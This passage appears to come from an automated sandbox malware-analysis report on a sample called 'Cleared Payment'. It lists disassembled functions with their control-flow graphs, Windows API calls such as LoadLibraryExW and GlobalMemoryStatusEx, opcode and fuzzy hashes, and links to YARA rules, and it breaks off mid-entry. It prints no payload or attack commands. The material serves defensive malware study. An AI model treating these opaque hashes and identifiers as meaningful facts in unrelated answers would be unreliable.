                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: 92926e300ac9e411a2e6adf4b8f4807bc62e076fe43295965ea02c06ac07ac32
                                                            • Instruction ID: 579c0352e43d0f8539cc2987e6ec00e5dd43e27539b6c37fa151b5a0b2f243a7
                                                            • Opcode Fuzzy Hash: 92926e300ac9e411a2e6adf4b8f4807bc62e076fe43295965ea02c06ac07ac32
                                                            • Instruction Fuzzy Hash: 2811E4B6D043499FDB10CFAAD844ADEFBF8EB88710F10846AE519A7200C7B5A545CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BAA2D0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 467 6baa2d0-6bab7c0 469 6bab7c8-6bab7f7 LoadLibraryExW 467->469 470 6bab7c2-6bab7c5 467->470 471 6bab7f9-6bab7ff 469->471 472 6bab800-6bab81d 469->472 470->469 471->472
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06BAB5F9,00000800,00000000,00000000), ref: 06BAB7EA
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6ba0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: 5e0d060d4062e9c5cc671eeef045687fb3f645c824709d2ab24dcb1500be9167
                                                            • Instruction ID: 2b88b65a168e7a45a8f018ac184f8032f07f468cb5c62986d3a713d89e5d2bb6
                                                            • Opcode Fuzzy Hash: 5e0d060d4062e9c5cc671eeef045687fb3f645c824709d2ab24dcb1500be9167
                                                            • Instruction Fuzzy Hash: E211E4B6D043499FDB10CF9AD884B9EFBF4EB48710F10856EE529A7200C3B5A545CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02BCEB40 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 475 2bceb40-2bceb7e 476 2bceb86-2bcebb4 GlobalMemoryStatusEx 475->476 477 2bcebbd-2bcebe5 476->477 478 2bcebb6-2bcebbc 476->478 478->477
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNELBASE ref: 02BCEBA7
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3325348851.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2bc0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemoryStatus
                                                            • String ID:
                                                            • API String ID: 1890195054-0
                                                            • Opcode ID: e12085a6a5732ce487e3ae5c6e658aac56f061795546c7baaac640e1279885f1
                                                            • Instruction ID: c3a1af4657828b45186dd98a912e5544e7eda8e43565fe9e9835710f0a26ce9b
                                                            • Opcode Fuzzy Hash: e12085a6a5732ce487e3ae5c6e658aac56f061795546c7baaac640e1279885f1
                                                            • Instruction Fuzzy Hash: 231112B2C0065ADBCB10CF9AC544B9EFBF4AF48320F10816AD918A7240D3B8A950CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BAB518 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06BAB57E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6ba0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 2301627c6764141f0d757a5dfbee52ca84cb74ef96ebc96da6698eaa57b6e7df
                                                            • Instruction ID: 078137470eafe6f7b30f7a439ba86fe3c14cca2fefe4ef2c1e5aa670f53da0f3
                                                            • Opcode Fuzzy Hash: 2301627c6764141f0d757a5dfbee52ca84cb74ef96ebc96da6698eaa57b6e7df
                                                            • Instruction Fuzzy Hash: 2611DFB6C047498FDB10CF9AC444B9EFBF4EB88724F14846AD929A7210D3B9A545CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB2370 Relevance: 1.0, Instructions: 1000COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3986614761dbd91b5784d35a612255159e794bf10115dceef9303bfbbdf6ff37
                                                            • Instruction ID: f27736558a7739b0b58d00e03af587d45a336ff480bd0eb37bc2be7bc2480d0a
                                                            • Opcode Fuzzy Hash: 3986614761dbd91b5784d35a612255159e794bf10115dceef9303bfbbdf6ff37
                                                            • Instruction Fuzzy Hash: DE926874E002058FDB64DB68C584AADBBF2EF44314F54A4A9D40AAB365DBB5ED81CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BBCF28 Relevance: .8, Instructions: 802COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f263d90827ba14fa05cf766e515385beaca78aa77e2b938ffa9528ce4423cef
                                                            • Instruction ID: 6ec8195d1fcb7a8a01c0bf673badd9f83766183ff6f7ae6ea436104456b13ce4
                                                            • Opcode Fuzzy Hash: 9f263d90827ba14fa05cf766e515385beaca78aa77e2b938ffa9528ce4423cef
                                                            • Instruction Fuzzy Hash: 39622E70A11206CFDB55EB68D590AADB7B2FF84304F2099A8D0459F359DBB9FC46CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BBB648 Relevance: .5, Instructions: 467COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 630fdc042b3b4695ae53317972ee1adf96e7372e53f59c5b8b2f3b399243e5e6
                                                            • Instruction ID: 92a65534eba51f39c8ab20f3cfc1817b71bd0f7cc93351c63781259d05790cf8
                                                            • Opcode Fuzzy Hash: 630fdc042b3b4695ae53317972ee1adf96e7372e53f59c5b8b2f3b399243e5e6
                                                            • Instruction Fuzzy Hash: 79025DB0E1020A8FDBA4DB69D4806BDB7B2FB85310F10A5AAD446DB355DFB4EC41CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BBACC8 Relevance: .4, Instructions: 396COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83532ec29248c3d6c62b580509050875cab017b89f2d94343467da5e92c50dd4
                                                            • Instruction ID: 160441a720aa4f982cd056ec745114763c14bf1c6594d81e5376fe9651823a43
                                                            • Opcode Fuzzy Hash: 83532ec29248c3d6c62b580509050875cab017b89f2d94343467da5e92c50dd4
                                                            • Instruction Fuzzy Hash: 6BE16F71F102068FDB65DB68D8806AEBBB2FF89300F20A569D405AB345DFB5D846CB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB9148 Relevance: .2, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cef0a0d318762419b57d4732d6d57e3288719cd66f923b0abe82dd760d961ffa
                                                            • Instruction ID: f061c3accf408c453b73c31f845ec9401d11324eb97a5b6ebc39df826ef37864
                                                            • Opcode Fuzzy Hash: cef0a0d318762419b57d4732d6d57e3288719cd66f923b0abe82dd760d961ffa
                                                            • Instruction Fuzzy Hash: F9914271B1115A8FDB54EB69D850BAEB7F6FF85200F1095A9C50ADB348EF70EC418B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB61E8 Relevance: .2, Instructions: 229COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9a1794b97cbdd73a1a0d7ad63845c88beb02299784f9520a09df94fddaca50ab
                                                            • Instruction ID: c1d6952ccbb45338ce87465acb35a3b4982db4a7111b27e535657b87f2604712
                                                            • Opcode Fuzzy Hash: 9a1794b97cbdd73a1a0d7ad63845c88beb02299784f9520a09df94fddaca50ab
                                                            • Instruction Fuzzy Hash: 7561C3B2F001624BDF549A6DC8806AFBBD7EFD4210B155479E90EDB364EEA5EC0287C1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB42A0 Relevance: .2, Instructions: 224COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1c364c9e8dff1509d5ca507228ff64d93557c47248ed9a360aea4cda69324792
                                                            • Instruction ID: b930e77d979bba4dfb16ffd50c12150263397bc320185a2f3624b8718e7288b8
                                                            • Opcode Fuzzy Hash: 1c364c9e8dff1509d5ca507228ff64d93557c47248ed9a360aea4cda69324792
                                                            • Instruction Fuzzy Hash: B3816C70B0120A8BDB54DFA8D4947AEB7F2FF89300F149468D50ADB389EB74DC428B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB45C0 Relevance: .2, Instructions: 218COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2d68cae0a2a5cadb560d16b8ebb34c69f7db36e7893d93145f52bf36380ed8e3
                                                            • Instruction ID: b2d807d6b01be9a79cf4804303209c4daf964453414b1c866edcd6b6dac22111
                                                            • Opcode Fuzzy Hash: 2d68cae0a2a5cadb560d16b8ebb34c69f7db36e7893d93145f52bf36380ed8e3
                                                            • Instruction Fuzzy Hash: B7915E70E1025A8FDF60DF68C840BDDB7B1FF89300F209599D549AB245DB70AA85CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB45D8 Relevance: .2, Instructions: 210COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b4ae662603a34328b1cc6283f17692ccb8bac73716a408b84e95e3e759d1cc55
                                                            • Instruction ID: 566735c668832547dd479db02007ad78709380ab9e5cd4eef5cd2434b8c00842
                                                            • Opcode Fuzzy Hash: b4ae662603a34328b1cc6283f17692ccb8bac73716a408b84e95e3e759d1cc55
                                                            • Instruction Fuzzy Hash: 7E914D70E1061A8BDF60DF68C840BDDB7B1FF89304F209599D549BB245DB70AA85CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BBEAE8 Relevance: .2, Instructions: 204COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a1ab1548c000b089f7ad9cba0ee1ac317c370a9754bdac9c8958d433cf1d097b
                                                            • Instruction ID: 4356900cf14793f255470d1b06d992663cb01ee5b04774bbd80e03cba218defb
                                                            • Opcode Fuzzy Hash: a1ab1548c000b089f7ad9cba0ee1ac317c370a9754bdac9c8958d433cf1d097b
                                                            • Instruction Fuzzy Hash: 03712B70A002099FDB54DBA9D980AEDBBF6FF88344F249469D015EB365DB70EC46CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BBEAF8 Relevance: .2, Instructions: 201COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 87d02ba759868ad68e2d20285506fc3506abcfbb1f719ba81c91c4717059203e
                                                            • Instruction ID: 3e118745856bcc0169fc658c88adecadb011ec2266983e87a97d431c23a74ebd
                                                            • Opcode Fuzzy Hash: 87d02ba759868ad68e2d20285506fc3506abcfbb1f719ba81c91c4717059203e
                                                            • Instruction Fuzzy Hash: AA712A70A002099FDB54DBA9D980AEDBBF6FF88340F249569D005EB365DBB0EC46CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB4B70 Relevance: .2, Instructions: 186COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9c48002d793649bca3406370547887761c47be6721420365450b7b0acc91109e
                                                            • Instruction ID: a568609da031838595cd6e0cf0c2471c11eb286fe834a945f18f41f5089d081a
                                                            • Opcode Fuzzy Hash: 9c48002d793649bca3406370547887761c47be6721420365450b7b0acc91109e
                                                            • Instruction Fuzzy Hash: 9C618071F002199FEB649FA9D8547AEBBF6FF88300F208429D106AB395DAB54C45CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BBFC61 Relevance: .2, Instructions: 178COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 97cc01ce5759f461c7d20694f721b0bc75fdb11dddd846d6b24d2481f565381d
                                                            • Instruction ID: 15d79e8f6fa4db115ae647dbd22e072d01652863c74206ef1cd8dd0fd1a912bd
                                                            • Opcode Fuzzy Hash: 97cc01ce5759f461c7d20694f721b0bc75fdb11dddd846d6b24d2481f565381d
                                                            • Instruction Fuzzy Hash: 6A5101B2E10109DFCB64AF78E8942FDB7BAEF84311F1098A9E506D7351DB719845CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB9137 Relevance: .2, Instructions: 171COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5a6f6c91d4a6f30b1bb39e126af3c52eebfd09120dbd3658f5b522b6e4a9e695
                                                            • Instruction ID: 2a094c00003111d67a6458b7bd21544bbf623ae805f6d8d6c1b07ef1787b30bd
                                                            • Opcode Fuzzy Hash: 5a6f6c91d4a6f30b1bb39e126af3c52eebfd09120dbd3658f5b522b6e4a9e695
                                                            • Instruction Fuzzy Hash: 09515171B011569FDB55EB78D890BAEB7F6FF85200F149469C50ADB348EA71EC01CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BBFA12 Relevance: .2, Instructions: 170COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 303896ee49926e129a77da6a1a74696451a6b520dbf68f07b617acc23f502a1f
                                                            • Instruction ID: bacef8b8853b09cb1efa451630207f1db2aecf8e80efa0bc6b66f6beca49b7e0
                                                            • Opcode Fuzzy Hash: 303896ee49926e129a77da6a1a74696451a6b520dbf68f07b617acc23f502a1f
                                                            • Instruction Fuzzy Hash: 4651C8B0F201059BEF6556BCDC64B7E3A5ED7C9310F106465E50AC7396CEB8CC4187A2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BBFA20 Relevance: .2, Instructions: 163COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5ad0d400414d9fb1d2b06bd011ae3cf9d0acfeea2e4dbddea44c54b72b8a9d8c
                                                            • Instruction ID: d171661c28f7af762572df9dcc5d89ab03c58c0bcd353bac1e6251e254b3d1a5
                                                            • Opcode Fuzzy Hash: 5ad0d400414d9fb1d2b06bd011ae3cf9d0acfeea2e4dbddea44c54b72b8a9d8c
                                                            • Instruction Fuzzy Hash: 785196B0F201059BEF6466BCDC64B7E3A5ED7C9350F206465E50AC7396CEB8DC4147A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB5418 Relevance: .1, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5bb2ed0a0c268f64d74379df7dc5944fbe224077ececd41cf276934fac3ced24
                                                            • Instruction ID: 7e9ea28cc0d927a861c7279cafef35484077b6329fe38c8108dc30685fd60307
                                                            • Opcode Fuzzy Hash: 5bb2ed0a0c268f64d74379df7dc5944fbe224077ececd41cf276934fac3ced24
                                                            • Instruction Fuzzy Hash: 16416DB2E006098FDF70CEA9D880BFFBBB2FB84311F10596AD255D7654D270E8558B92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB4B60 Relevance: .1, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b5b0049c6fd59da9d4593ee2334c30df2a38ab9fa7e25900d41cc212cbb2a95d
                                                            • Instruction ID: 08fc1263f27111de927dbbfbbcfa3a1152a54a76cf8f69cff3444e44086819c6
                                                            • Opcode Fuzzy Hash: b5b0049c6fd59da9d4593ee2334c30df2a38ab9fa7e25900d41cc212cbb2a95d
                                                            • Instruction Fuzzy Hash: EC419370F002199FDB55DFA9C854BAEBBF6FF88300F208529D106AB399DA754C05CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BBDA9D Relevance: .1, Instructions: 123COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ec96c20f53c2db94be1fc665f1291b345ba8533fff2defb45b3b4ce3e7633042
                                                            • Instruction ID: c65c64b5cbccae1d3051546839f02135a80cdc4128276bbb02d5f0db7024480b
                                                            • Opcode Fuzzy Hash: ec96c20f53c2db94be1fc665f1291b345ba8533fff2defb45b3b4ce3e7633042
                                                            • Instruction Fuzzy Hash: 0C419270E0020ADFDB65DF69C4846EEBBB6FF85300F205569D806EB344DBB99845CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB21F8 Relevance: .1, Instructions: 105COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 108b893264acf760d115584813b3bf1ec17a06a25fcb620940d2498392a17a14
                                                            • Instruction ID: a67494a8f9f696c756540caf69984f770aaecf88982bd3fb30ae43afb5b0acba
                                                            • Opcode Fuzzy Hash: 108b893264acf760d115584813b3bf1ec17a06a25fcb620940d2498392a17a14
                                                            • Instruction Fuzzy Hash: D2310070B102068FDB69AB75C4546BE3BA7FF89200F2064ACC402DB384EE75CD01C790
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BBD950 Relevance: .1, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f1408b8d702f0c7153c049a5d14f71b0db56e53d93acc10e209fcf74c784b8c4
                                                            • Instruction ID: cef9e1d41eb6ca8ce7e09bb48007e1d1facda4a344ecf98cecb6b2b1fda27393
                                                            • Opcode Fuzzy Hash: f1408b8d702f0c7153c049a5d14f71b0db56e53d93acc10e209fcf74c784b8c4
                                                            • Instruction Fuzzy Hash: 5831A470E1020A9BDF65DF68C8906DEBBB6FF85344F109969D505EB340EBB4A946CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB20A8 Relevance: .1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6530c785eeda938984bc05d2ea57c0ff6d250811098f40d24a19dc6bb38cf29f
                                                            • Instruction ID: fd27b09d0d94f5866154e89e41dd6e185bf77e80203447848bd56426f17b7257
                                                            • Opcode Fuzzy Hash: 6530c785eeda938984bc05d2ea57c0ff6d250811098f40d24a19dc6bb38cf29f
                                                            • Instruction Fuzzy Hash: 5A31ADB0E102169FDB25CF64D8546AEB7B2FF89300F508559E916EB380DB71A982CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB20B8 Relevance: .1, Instructions: 91COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d5976f94af3f88c5990c0a821b7b0986466fea95daca584c443ca4a65448a137
                                                            • Instruction ID: a8f838eb1b7ab3b476baa737ccbcb7d014bb2e032f6f3aa075c007247e0cc689
                                                            • Opcode Fuzzy Hash: d5976f94af3f88c5990c0a821b7b0986466fea95daca584c443ca4a65448a137
                                                            • Instruction Fuzzy Hash: 2E319AB0E102169BDB19CF64D8546AEB7F2FF89300F109569E906EB740DBB1AD42CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB3AA0 Relevance: .1, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b9ec9688ab641483da0ac539ec895e67f2f5dbbb62cd97202e78fe84335fda73
                                                            • Instruction ID: 218a9532023ade99c97e4bbd5dd00571f82cc11ec85e5fd120086e6b85486de5
                                                            • Opcode Fuzzy Hash: b9ec9688ab641483da0ac539ec895e67f2f5dbbb62cd97202e78fe84335fda73
                                                            • Instruction Fuzzy Hash: 68218371F016159FDB50EF69D880AEEBBF1EB48710F149065E905EB384DB71D8418B94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB3AB0 Relevance: .1, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b752995bad9840404569d9570f52f8095fe09b32e096aa9c8f53dfa468ef7826
                                                            • Instruction ID: a90903eefee824b36400c0828f6bec55657f8c4731cf2e866765680e87c92b31
                                                            • Opcode Fuzzy Hash: b752995bad9840404569d9570f52f8095fe09b32e096aa9c8f53dfa468ef7826
                                                            • Instruction Fuzzy Hash: E72190B6F116159FDB50EFA9D880AEEBBF1EB48710F149069E905E7384EB70D840CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0138D030 Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
